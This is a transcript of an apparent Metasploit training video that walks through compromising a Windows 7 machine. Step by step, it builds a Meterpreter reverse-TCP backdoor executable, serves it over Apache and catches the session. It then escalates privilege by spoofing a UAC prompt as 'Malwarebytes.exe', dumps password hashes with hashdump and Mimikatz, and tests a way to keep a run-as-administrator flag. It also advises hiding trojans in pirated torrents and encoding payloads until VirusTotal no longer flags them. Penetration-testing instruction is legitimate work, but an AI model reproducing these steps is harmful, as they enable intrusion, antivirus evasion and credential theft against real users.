Alright everybody, so in this video we are going to talk about Windows 7 finally. Everything that we have learned with Windows XP as far as the functionality of Metasploit will still be the same with Windows 7. We'll still be able to dump password hashes, crack passwords, browse through the file structure, download, upload, execute, all that stuff. We're able to do everything. So that's why we wanted to learn everything with XP, and now that we've learned all that capability, functionality, we can now test that with Windows 7 and you'd be good to go. Now the only difference is that with Windows 7 there are no current zero-day exploits. There is no one exploit that's just going to break into every Windows 7 machine. I'm sure that they do exist, but they're not in the hands of the public. There are some people's jobs where it is to make 0 days, and they will sell them to other countries and so forth for hundreds of thousands of dollars, depending on what it is. So, and you have to think about it. If you end up getting into exploit development, for example, if you are able to eventually start writing your own exploits, you've got to think about it, because the minute that you put it into the public's hands, it then almost becomes worthless, because the manufacturers will get a hold of that and then they will patch their systems. At least they should. So that's what a lot of people do. They will create exploits and then they will sell them. Anyways, so being said, there are no 0 days that we can use with Windows 7. When something like that does not exist. Now, for example, with XP, we can do a port scan, and if we were able to find that port 445 was open, then we were go ahead and we were able to use that MS08067 exploit. Now, with Windows 7, those ports are still going to be open, but again, that exploit will not work. It's been patched. So, when you cannot directly exploit a vulnerability like that, the only other things that we can do are to generate payloads and have the user execute them, or attack outdated software, outdated versions, whatever's running on those ports. We can try and attack that. So if we don't have a nice little 0 day that'll just work out of the box, then we need to find other ways to attack the system. And so that's what we need to do with Windows 7. I wish there was an easier way. There just isn't currently. So the version of Windows that I have is, I believe it's just a straight out of the box Windows 7. I believe it's I think it's Ultimate. It's either Ultimate or it's Professional, but we'll find that out soon enough. It does not matter. You can have a Service Pack 1, you can have it fully patched, you can have Windows 7 Ultimate, you can have Windows 7 Home, whatever it is, it doesn't matter. We're still going to be able to do the same things. So with that being said, let's jump over to our Start menu. I'm going to go to Control Panel, and I'm going to go to User Accounts and Family Setup. And I'm going to go to User Accounts. We can see that my user is John, and he is a standard user. He's not an administrator, and it's obviously password protected. That's just my preference. So I want you to go through these first exercises not as an administrator. So if you need to create another user, then you would need to go ahead and do that, and just create a standard user. Do not create an administrator. And if you need help with creating users in Windows 7, you can still do it through the Control Panel, Administrative Tools, and then you can still go to your users and computer management and so forth. It would be the same thing like we were doing with Windows XP, just looks a little bit different. So make a couple of users, and then obviously have your administrator account whenever you do your install or after your install, whatever it is. And obviously make sure that your networking is configured properly for communicating. Obviously, if we can't talk to this machine, if there's no way for these machines to talk to each other, then we're not going to be able to do anything. So in my Kali machine, I've got Metasploit services already started, and Metasploit is ready to go. I'm going to scroll down here. So let's take a look at a couple other things with Windows 7, because I want to make sure that we're on the same page. Control Panel. And we're going to go to System and Security, Windows Firewall. Now, the firewall is on. However, if I go to change this, turn Windows Firewall on or off, we're going to notice that something happens. We get this pop-up. This is called UAC, or User Account Control, as you can see in the left-hand corner up here. This is one of the main differences between XP and Windows 7. And as the hacker, this is one of the things that we have to be concerned with, is this UAC. Now, Metasploit is prepared to handle UAC a couple different ways, so we're going to go ahead and explore that. And after that, we're going to talk about some other interesting concepts and ideas that you guys might be able to use later on. So obviously, to change the Windows firewall, I would need to know the administrator's password. Here is the administrator, Raven, and I would need to know the password. Now, if you know the password, that's great. You can hit yes, and it will let us go into the firewall. But I want to make sure that the firewall is turned on. And my UAC settings, I have not tampered with that in any way. Whatever the default setting is, that's what I've kept it. I'm not going to, there's a lot of people out there that will make some videos with Windows 7 and they will turn the UAC all the way down. We'll turn the firewall off down, or turn the firewall off and all that, but we're not going to do that. We want to keep it as normal, as out of the box as we can. So, alrighty. I'm going to go back to, go ahead and start up your Metasploit, and what I'm going to do is I'm going to open up another tab, and what I'm going to do is we're going to need to make some payloads. Now, this is just getting ahead of the game. We'll make the payloads here maybe when we start doing our Nmap scan, just to save a little bit of time. So the first thing I'm going to do is I'm going to delete all the hosts out of here. Now, this is optional, but I want to start from scratch since we're now on to Windows 7. So I'm going to do a host-d that deleted all of those hosts. I can do another hosts, and there's nothing there. I can go ahead and type clear. That clears out my screen. So at this point, as long as your network is configured properly, then these machines should be able to talk to each other. So I want to do a db_nmap, and the first thing I want to do is I'm just curious as to what hosts are on the network. Now, I know that only Windows 7 is running, but to be a little bit more realistic, I'm going to do a $PR, lowercase sn, make sure you put the dash in there, and then the IP range, 192.168.6.0/24. Again, I can use this other tab, do an ifconfig, and make sure 192.168.1.101. So let's go back here and change this to a 1. There we go. So make sure that we're on the same subnet, 192.168.1.0/24. I'm going to scan everything. And of course, I'm going to go ahead and add that -v in here for the verbose, so for the verbosity. That way I don't think that it freezes up. We can keep an eye on exactly what it's doing. Now, once that is running, let's just go ahead and here save some time. We're going to go ahead and do an MSF payload. And what we're going to go ahead and do is we're going to select our payload as the Meterpreter Reverse TCP. So Windows/Meterpreter Reverse _TCP. Now we need to set our L host equals 192.168.1.101. Our L port doesn't really matter. We can do a. I'm going to do all 7s just because, hey, we're doing Windows 7, so I'm going to remember 7. So let's just do 4 7s. And if there's other things that we could do, but I think that's mainly what we want to do. And I'm going to do a capital X. That means that we're going to port it out to an exe, a greater than sign, and let's go ahead and name this. And I'm going to go ahead and name this backdoor 7777.exe. That way I remember that's on 7777. Now, I'm just going to hit enter. If I wanted to save that in another location, I would need to specify that, but I'm just going to throw it in my root folder, and we'll go ahead and move that once it gets generated. Let's go back to our Nmap, just kind of multitasking here, and we're going to scroll up and see where our host is, and we can see that check it out, 1.7, easy. Windows 7, I put it on 7, easy to remember. So now what I'm going to do is let's go ahead and do our port scan. Of course, we can use Nessus, we can use Nexpose or Nexpose, any other vulnerability scanner. You're welcome to do that. That'll save you time. It'll report those CVE numbers if it finds any vulnerabilities and that sort of thing. We're going to get more practice with that and looking at CVE numbers and stuff in future videos. So I'm just going to use Nmap, db_nmap. I'm going to do a capital or a lowercase sv, a capital A, a capital O, capital, or just a lowercase v, 192.168.1.7. And I'm happy with that, so I'm going to go ahead and hit enter. While that's doing that, let me make sure that it's working. Okay. While that's doing that, we should have got some feedback here, which looks like our backdoor was created. I'm going to do an ls, and we can see that my backdoor 7777.exe has been created. What I'm going to do now is I'm going to actually move that to my backdoors folder. So I can do that by using the mv command, backdoor 7777.exe, and then the location. So root slash root slash backdoors. I'll go ahead and do an ls. And we can see it's no longer there, so now I can change directory to our backdoors, do an ls, and there it is, backdoor 7777.exe. Now, since I have that done, I'm going to actually also make a copy of it, and we're going to put it into our Apache folder, where our Apache stuff is loaded at, or so that the user can browse to our computer from Apache, using our Apache server. So just like they were going to a website, it would go ahead and serve up whatever we have in that directory. Obviously, if we had an index.html, it would show them a web page, whatever that is. But we're not creating a website. We're just going to throw the raw files in there. That way the user can click on it and download it. And we'll talk about some more interesting things here in just a second. And our Nmap scan has finished. So we can scroll up and look at this data. And we'll notice some similarities. For example, here's the NB stat, NetBIOS name, SMBOS discovery. Same type of thing that we were seeing with our XP machine. We can see OS details, Microsoft Windows 7 Professional, Windows Vista Service Pack 0, Service Pack 1, so forth. We can also see our list of open ports. Again, we've got 139, we've got the 445 open, just like we had with XP. But again, you can't use the exploit that we're using with XP on Windows 7. Let's do a hosts, and let's see what it ported in there. So we can also use the same auxiliary scanner for SMB version to try and detect a little bit more information. So we're going to do that. Again, this is why you learned everything with XP. Everything that we did with that, we're doing the same exact stuff with Windows 7. So use auxiliary scanner SMB underscore version. Let's do a show options and set our hosts 192.168.1.7 show options, and I'm going to leave the threads at 1 this time, and let's just do run. There we go. Now let's do a hosts. We can see that my build is, this is a build number, which is 7600, and it says it's Windows 7 Professional, so awesome. We got a little bit more specific information. So right now it's currently not that important, just because Windows 7 is very well patched compared to XP. So again, this information right now with our current situation isn't really going to help us. What's running on the ports at this point would be what we were looking at more. Now we would probably, if we were trying to find anything else, we might do a full port scan on this. Remember that Nmap is only going to scan the most common 1000 ports. So if we really wanted to dig in on this target, we may do a port scan of all 65,000 whatever it is ports, and try and see if there's any outdated services running or anything like that. In this case, there really isn't. There's nothing that we have currently that's running out of the box. So what we're going to go ahead and do now is I'm going to use the cp command, and this is going to copy. So I'm going to copy backdoor 7777.exe to /var/www, and then I can name it again, backdoor 7777.exe. You can name it. You could actually, when you do this, you could actually rename it to whatever you want. Now I can do a cd var www. There you go. And let's do an ls, and there's the backdoor. So what I like to do is I like to keep all of the backdoors inside of a backdoors folder, so that we have a history of what we've done, and in the future we can even use that. You have to remember that this backdoor is not specific to this Windows 7 machine. All that's really specific is the port number, which was in all 7s. So once we have this, we've already generated it. Awesome. Obviously, we would encode it in a realistic situation. We would then maybe run that against VirusTotal. VirusTotal is a great website for checking to see if your file is if it contains any kind of viruses or anything like that. VirusTotal has a massive database, and it'll give you feedback from, let's say, AVG, Malwarebytes, Norton, Symantec, Trend Micro, like their PCCillin or Housecall. There's a massive list of major antivirus companies that it has on there, and it will check that file that you have against all of those databases. So that's another thing that I want to talk about just real briefly, is if you really think about it, a lot of people, and we're going to go ahead and use the torrents, for example. I love using torrents as an example because it really is a great way for people to, whether it's legal or not, it's still a fact. People use those to encode, or not encode, but wrap their Trojans with it. They'll make an installer and it'll install this, but it'll run let's say it'll run the backdoor first and then everything else after. A lot of different things that we can do. So, and let's say, because you would say, well, how does a person get this file? How are they going to get this backdoor that we have? And so there again, the torrent is a perfect example of that. Let's say, and then obviously people, let's say it's I don't know, like Adobe Photoshop, or if it's Microsoft Office or whatever the torrent is, those types of programs, they're valuable and a lot of people look for them. And so when they find it on a torrent, if they're going to pirate stuff, they'll download it and they will probably scan it. They may scan it, they may not. But as long as their virus scanner says everything is cool, then they're going to go ahead and install that. And so to get past that antivirus, all we would do is we would just encode it until we could cross-reference that file with all those different databases using VirusTotal. Just check out like virustotal.com, I think is what it is. Or just go to Google and type in VirusTotal and then just upload your file, and it will tell you if it's detected by any of these major antivirus companies. So really handy info there. Now, of course, you could always send it to somebody and say, here you go, click on this, whatever, and they may open it. Most people, though, are at least somewhat intelligent, that they know that they're not going to, they're not supposed to open things that they don't know who the sender is, or just opening up an exe file in general. And a lot of people also, to kind of be safe, a lot of people will transfer files inside of like a zip folder, or a zip, they'll compress it into a zip file or a RAR, and that's kind of like almost like a respectful way of sending things. So people are like, oh, okay, so now I can scan the zip file, and as long as no viruses are found inside, they'll extract it, and then again they'll execute the exe. So there's a lot of little tricks and stuff that you can use to try and do that. I can't obviously go into every little possibility, but how you get the backdoor onto your target machine is going to be up to you. There's also things like USB sticks and stuff. There's malicious USB sticks that when you plug them into a computer, they will automatically put code or whatever it is onto a system. Just there's so many different examples. But I do like to use those torrents as an example, not to scare everybody away from torrents. Again, like I said, whether it's legal or not, I'm not going to go into that. Obviously, piracy is illegal. It's costing companies millions, if not billions of dollars. So it is a huge problem, but that means that there's a lot of people doing it. And that's a lot of stuff that could be floating around. If you're just trusting your antivirus, that does not mean that you're virus free. That's just your antivirus telling you that you're safe. But it really doesn't know that. It's relying on definitions. That's why you update your virus scanner. You update these definitions. And if it's not if the scanner is not programmed to look for something specific, then it's not going to find it. And that's how we can get around that. So there's your little lecture there. Let's go ahead and get back to it. The next thing that we're going to go ahead and do is we're going to start our Apache server. And we're going to do that by going to Applications, Kali Linux, System Services, HTTP Apache to start. Alright, and as long as you get this OK returned, then you're good to go. And you may already have your Apache service running. It'll just say, it should still give you that OK. So now we're going to go back to Windows 7. And let's go ahead and open up our browser, which Internet Explorer is always there. And of course, I'm not online, so it's going to probably
tell us that something's wrong. But that's okay. We're going to go ahead and navigate just to, there we go, 192.168.1.101. And there we go. I can see my backdoor 777.exe. Now, technically, yes, we could have had a nice little website here. We can make it look believable. We can clone, for example, we can clone a Facebook page. We can clone, Gmail or Hotmail or Yahoo, whatever it is. We can make it look identical. Or let's say it's a bank. You can clone a bank website, and you can put, things that users might click and download on there. Now, I go into that stuff in my phishing class, so I'm not going to teach that here in Metasploit, but we are able to use this just as a way to get the file onto our target machine. So I'm just going to click on this. We're going to download it. I'm going to go ahead and hit save. Now we can hit run, and that would still work, but let's go ahead and save it. We'll go ahead and save it to the desktop. There we go. I'm going to go ahead and close that out, and let's go ahead and take a look here. And there's our backdoor. Now, sometimes it will automatically have a little shield in the bottom right hand corner, which means that it is going to try and execute it with administrative privileges. It's basically the same thing as right clicking on this and then clicking run as administrator. Now, sometimes I get it and sometimes I don't. It doesn't matter. We're still going to talk about it because there's a possibility that you may have different results than I have. Right now, if the user executes this, it's going to execute as the user. If it has that shield in there to run as administrator, then the UAC is going to pop up, and you will have to type in the password to get around it. But the good news is that if the password is typed in, you will then get a Meterpreter session with administrative privileges. Now, John here is a standard user. And so we're going to be extremely limited with what we can do. We're not going to be able to turn off the Windows firewall. We can't, if antivirus, we can't stop any services. We can't start any services. So we're very limited, which is why we want to try and, obviously get our privileges. So just be aware. You may get different result than I have, and that's going to be the difference. But we're going to go ahead and set up our listener, because otherwise we're not going to be able to get this session. So what I'm going to go ahead and do now is we're going to use exploit multi handler, show options. Now again, I can just do a set L port, but what I'm going to go ahead and do is I'm just going to tell it what kind of payload we're expecting. Again, as you've seen in previous videos, it will still work as long as you have the port correct. But anyways, this will help it at least expect a Meterpreter session. So set payload, Windows Meterpreter. I hit tab there. Let's see if it catches up. There we go. Reverse TCP. Now I can show options. We'll have that extra section in there for that payload. And there's the L port. Obviously that's wrong. So set L port 7777. And we're going to set our L host 192.168.1.101, which is my Kali machine. Show options. There we go, and we should be good. Now if we do an exploit and we do a -J, that is one way to run the handler in the background. So let's say that I hit enter. There we go. Now you see it says starting the payload handler, but it says started reverse handler. Everything, the port's correct, and it says exploit running as background job. So it's going to sit here and it's going to wait for it. Now let's see what happens when we click on our backdoor. I'm going to click run, go back to Kali. As you can see, it's sending a stage. Meterpreter session 1 opened. And so it didn't drop it into that Meterpreter session. So it's still running in the background. So obviously, if I hit enter, it will return me to my MSF console, and I can do a sessions-L, and there's our session 1. So it didn't automatically drop into that session. I'm just showing you that because it's just a little bit extra knowledge. You can use that -J if you just want to run it in the background and catch Meterpreter sessions. So we can see that it's a Meterpreter session. We can see the user, the computer name, the ports, and all that other stuff, just like we were able to with Windows XP. Now, the backdoor is running as the process as they executed it. So there's going to be a process that says backdoor 777 if they look in their process list. And we want to obviously try and move away from that as fast as possible. Otherwise, we can lose that Meterpreter session. So I'm going to do a sessions -I and the number 1. We are now in Meterpreter. So let's do a PS. And if it closes on me, that's okay. We'll just re-exploit because I want to do some explaining here. One thing that you should notice is that we don't see anything in here with NT authority system, NT authority local or network. It's just not there. This is an indication that John is not an administrator. If we do have administrator privileges, if we do have the admin privileges, which we'll see here in a little bit, you're going to see different results. We'll be able to see what's NT system or NT authority system local, all that sort of thing. So right now, right off the bat, I can tell that I am not an administrator, and so we would obviously need to do that. And you can also see that I'm running as backdoor 777.7.exe. Now, I obviously would like to be one of these SVC hosts or the LSASS process, but we cannot migrate to that. Well, even if we tried migrate, let's do 1328 on mine, which is an SVC host. It's not going to do it. It says insufficient privileges. So that's going to be an issue, but we still need to migrate away from this. One thing that we need to do is, check it out, explorer.exe. Now, there's iExplorer, which is the Internet Explorer, but if they just close the Internet Explorer, again, we're going to lose our session. So explorer.exe, that's a decent one that we can migrate to. So migrate explorer.exe. Oh, I gotta migrate to the process ID. Sorry about that. So 2512. And it's migrating. And there we go. We can do a PS. Our backdoor should be disappeared now, which it's not there anymore. So awesome, just as we expected. And so what do we do with this? If we try and do a get system, it's not going to work. Access is denied. Again, this is now it's an issue. This has to do with Windows 7. We've got the whole UAC issue. We can't just do a get system. It does not work. So we are only able to work with what we have. And there are a couple things that we can search for. I'm going to go ahead and background this. And we can search UAC. There's going to be a couple different ones here, and you can see that they have an excellent rank. There's a local ASK and there's a local bypass UAC. Now, this bypass UAC has evolved throughout time, throughout the last few months. And it has an excellent rank as if, well, geez, that looks pretty good. If we run that, then I bet you it's going to work. But that's actually not the case. They've changed this thing. If you can get an older version, you can test that. But currently, we'll try and use this. This is going to be our number one go-to. We want to see if this works. It's not going to create a pop-up. It's not going to alert the user in any way. It's going to execute this. We'll be able to grab the system privileges, and the user is not going to know any different. Now, but like I'm saying, this sometimes is not going to work. So it may work for you. It may work for me. We'll see what happens. Use exploit Windows local bypass UAC. Oops, I forgot the slash. Bypass UAC. Show options. Now, we already have our Meterpreter session. It's in the background. So I need to tell it which session number it is. So we can do a sessions-L. It's session 1. So I'm going to set session to the number 1. Show options. There we go. Now it's our number 1 is ported in there. So to do this, we would just do an exploit. And there we go. Exploit failed. No access. Not an admin's group. Cannot escalate with this module. And it started a reverse handler on 192.168.1.1.1.4.4.4. That doesn't matter. This is a whole separate process. Yes, we came in on 7777. but this doesn't matter. We're doing a whole completely different exploit. We've already got our Meterpreter session, but we're using a different port. So it did not work, and yours may work, but in our case it did not work. So what we're going to go ahead and do is try option number 2. So let's search again for UAC. And so we're going to use exploit Windows local and ask. Show options. It wants to know the session. That's mandatory. So set session to number 1. That's our Meterpreter session. Do show options again. There we go. It's set. Then there's the file name and there's a path. Now, here's what's going to happen. And here's where you need to realistically think about this. What's going to happen is when we run this exploit, there is the screen is going to turn dark, and it's going to have that UAC pop up. And so it will alert the user, and it's going to say something is trying to execute, type in this password. Now, if it is suspicious, then the user is probably just going to hit cancel. They might restart their computer if they're paranoid, whatever. We don't know. So we need, it is a little bit suspicious that it's going to pop up. But we can make it less suspicious if we can examine the processes that are running on the system. Now we can, let me be a little bit more specific here, and you're going to see here in just a second what I mean. The file name. This is the name of the program that's going to be displayed to the user. The file name doesn't have to exist. It does not. It's just going to show whatever we type in here. It doesn't have to be a real file on the system. So that doesn't matter. The path does not matter. So let's go ahead and set file name. Now we can do a PS and observe the processes. But I'm just running this Windows 7 out of the box, so there's no antivirus or anything. The firewall's on and everything, but here is a realistic situation of how I would do this. Let's say that the user has Malwarebytes, just like we did in XP. What I would do is I would change the file name to something related to Malwarebytes, either like Malwarebytes.exe, or try and find what that file name is, if it's like mbam.exe like we saw in XP. Something that the user is going to recognize. And if it pops up and says that Malwarebytes is trying to run, they're going to think about it, and they probably, now I can't speak for everybody, but they will probably say, well, yeah, I want Malwarebytes to run, and they're going to type in the password if they know it, and they'll execute it. So there's just a good example. I know it's not perfect, but we got to work with what we have here. And so examining the processes on the system and trying to, you can either duplicate a process name or find something that the user probably wants running. And when that pops up, they're going to say, well, of course I want it running. Maybe it crashed or something, who knows. But they get this pop-up. They should visually see the name. They should accept that in their mind because, hey, I want this antivirus to be running, and then they will hopefully execute. So that is my way of thinking on that. Of course, you could be creative and think of your own thing. But I'll do Malwarebytes.exe, which I don't even think the Malwarebytes.exe is named that, but I'm just using it as an example. You have to make sure that you put an extension. For whatever reason, UAC a lot of times will not pop up if you don't put the extension. So make sure you do that. Show options. Malwarebytes.exe. Okay. Now if we do the exploit, it says waiting for the user to click OK. Now if we wait here long enough, it's going to time out. So we want to try and do this as fast as we can. Let me see. I need to try and remember what my password is here. Let's see what happens here. There we go. Let's go back over here and see what happens. There we go. It opened a second Meterpreter session. Let's background this. Sessions-L number 2. So now we can do a sessions-I number 2. And now we're number 2. Let's do a PS. And check that out. There's our NT Authority system. There's all that good stuff that was hidden from us the last time. And obviously we're running as an administrator, so we can see that, which is why I wanted to bring that up. Now we can go and do our migrate and all that sort of thing. So what did this attach to? Let's do a get PID. 932 malwarebytes.exe. You can see that it's c:users John app data local temp malwarebytes.exe. So it has created a temporary file in the temp folder, which we could change that to system32 or wherever, just like I showed you before when we were looking at the file name and so forth up here. We can actually change the path. So wherever Malwarebytes runs out of, we might want to change that path. But just as an example, I wanted to show you the functionality of this. So let's go back down. As soon as we can migrate away from this, the better. So I'm going to do a migrate. And let's look for that LSASS process. There it is, 552. Let's try to migrate to that. Migrate 552. Awesome. Get PID 552. Now we can do a get UID. Let's see what we're running as. We are running as NT Authority System. So that's awesome. Now let's try one more thing. Let's background this. Let's go back to our first session, sessions-I, and then number 1. Let's try to do a get system one more time on this. Okay, still denied. Just want to double check. We opened a completely different interpreter session, but I would just try it one more time to see if it worked. So, other things that we can talk about. Now, from this, I'm going to go ahead and I'm going to actually exit that because I don't need to have that session anymore. I'm going to go and do a sessions-I and then the number 2. And we're back running as administrator. So at this point, we can do our hash dump. There's our hashes. We could load our Mimikatz and do a Kerberos. Let's do a load Mimikatz. And we'll type in Kerberos. There we go. Now this one is a little bit different. It gives us kind of like a hash format for the password. And in Windows 7, that's common. You'll see that a lot of the times, but sometimes you will get the plain text. At this point, you can just try and run through all your different Mimikatz commands, try and do that. But if nothing else, we've got the hashes. We can run our fast crack on there. We can use md5decryptor.co.uk. That works great. All the stuff that we did with XP, we can do all the same stuff here in Windows 7. So that's why, again, guys, I put you through all that XP work just so we can get to this point. So we can go ahead and install a persistent backdoor. We can do all kinds of stuff. And because we're running as LSASS, the only way that we're going to lose our session is if the computer is restarted or powered off. So we can add a user. We can do our netcat backdoor, just anything. All the stuff that we did before, you now have the tools to do it, but you can do it within Windows 7. So let's go ahead and talk about one more thing. Okay, so if you can find a way, now I haven't played around with this, but it's an interesting idea, and I'm going to be talking about this concept with a couple other people and actually see if we can get this implemented. But what we can do is, how does Metasploit create these EXEs or MSF payload? Can we get it to automatically run as admin? And I would like to have that in my toolbox. If we can just, without getting into all this and having to use these different exploits, if the user can just run this as administrator, that's going to solve a lot of our problems. Now, obviously, if the user is running as administrator, then no big deal. We'll be able to get those privileges right off the bat. But because we're kind of getting into Windows 7, I just, let's do it with a regular user so that you understand how to get past this UAC or what options are at least available for us. So the other idea that I had, which I have not done yet, but I'm curious. So what I'm going to do is let's change the properties. Now this may completely fail, guys, but it's just an idea that I have. We're in Windows. Let's go to compatibility. Actually, it's not going to let me change this, but I'm going to do change settings for all users. UAC will probably pop up. And go ahead and type that in. Oh, there we go. Run this program as an administrator. Apply. Say OK. And it's checked. And now it has the shield. So, but how do we get it to that point? How can we control this? And what I'm thinking of is we can then download this file back to our Linux machine. We can then use it as a template and create another exe. But because we use this as a template, it should take all of those properties from this file. And that may be a way for you to create always an administrative a UAC bypassing method, so that now that we do a payload, sometimes it may give you the shield, sometimes it might not. But now if we have one of these, we can just download it and re-upload it and see if it will have those same properties. So let's just give it a shot. I'm not sure if it's going to work or not. We could use it as a template, but what I'm curious is if I download this file and then re-upload it to a different location, will it keep its properties? If it can do that, then we've figured out a way to always execute this as an administrator. We can upload it on different systems, and hopefully it'll work. I don't know. It's just an idea that I have, guys. But these are the things that you gotta think outside the box to try and get around these situations. And the more stuff you have, I think the better. At least you'll have more options. So let's get back into our interpreter session. Sessions-I and the number 2. Let's go ahead and let's do a pwd, see where we're at. We're running out of system32. So I'm going to do a C:/. Let's just do, let's see, Windows 7. Let's do a dir. Well, I guess we'll have to type in, we can do an ls, and that'll translate that. So documents and settings, is there a users? Yes, there is a users. So let's do a cd users. I think I've got to do an ls. Let's see here. And we are John. So I'm going to try to do it without the C:, see if it lets me do it. And it'll let me do it. Cool. Do another ls. Here we go. And then there's the desktop. So I'm going to go ahead and cd desktop. Do an ls. And there's our backdoor. So let's go ahead and download that. Door 777.7.exe to root. I'm just going to put it in the root. I don't want to overwrite my other files or anything like that. Let's just remember that we want to throw it in root. Alright, downloaded it. Awesome. So now what I'm going to do is I'm just going to delete this off of our Windows 7 machine. I'm going to go ahead and empty it out, completely get rid of it. There we go. Now let's take a look at, there we go, do an ls, and there's the backdoor 777.exe. Now let's upload /root /backdoor 7777.exe. And I'm just going to upload it just like that. I'm going to upload it back to the desktop because I deleted it. If you don't delete it, then you may want to specify a different location. So let's just, it may require me to put in the C drive. We'll see what it does there. Okay, so I have to put in these specific locations. So C:, whack, we'll do, what was it? It was, I think it was users, wasn't it? Yep, users, whack. See, my short-term memory is no good. John, okay. Whack, desktop, whack. Let's see if that will work. And it uploaded it. Cool. And it's back there, and it has the administrative shield on there. So now if this was to be executed, let's just test it out. I'm going to exit out of this interpreter session. Do a sessions-L, just make sure it's all closed up. It is. Let's use exploit Windows, multi and handler. Set the L port 7777. Show options. It's still set from when we had it before, so it has my L host already in there because we've already done this before. So I'm going to go ahead and use exploit And so now that that's listening, let's see what happens. Automatically comes up with the UAC, which is normal because we're running it as administrator. There we go. It's sending the stage. That's a good sign. If it doesn't send the stage, then something's wrong. Meterpreter session 3 opened. And I didn't use the -J, so we're automatically in our Meterpreter session. I can do a PS and check it out. Everything automatically. I've already got that NT Authority system. Awesome. And now we would just do our migrate, let's say to 912, just to get away from this process in case they get suspicious and want to close it. Awesome. And that backdoor process closed out, so we're good. Anyways, guys, that's the gist of Windows 7 and how to kind of work around that UAC. Also gave you some other things to kind of think outside the box. Right now, everything is, those are the only couple things in Metasploit that we can use. So any other creative things that you guys can think of, I mean, these things are developed by the community. So if you have a really good idea or really a good way that you think that you can implement something, we may be able to get that added into Metasploit by Rapid7 or whatever. So you guys are definitely allowed to contribute if you guys are able to actually do some of this and be successful at it and actually prove that your idea works. So anyhow, guys, hope you enjoyed the video, and I will see you in the next video.